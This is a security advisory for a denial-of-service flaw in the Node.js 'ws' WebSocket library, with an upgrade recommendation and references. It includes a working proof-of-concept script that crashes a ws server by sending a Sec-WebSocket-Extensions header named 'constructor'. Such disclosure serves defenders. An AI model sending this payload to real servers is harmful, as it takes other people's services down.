Denial of Service in ws

GHSA-5v72-xg48-5rpm

Published Jun 4, 2019 · Modified Aug 4, 2021

Description

Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.

Proof of concept

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

Recommendation

Update to version 3.3.1 or later.

References

WEB https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a
WEB https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407
WEB https://snyk.io/vuln/npm:ws:20171108
WEB https://www.npmjs.com/advisories/550
WEB https://www.npmjs.com/advisories/550/versions

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes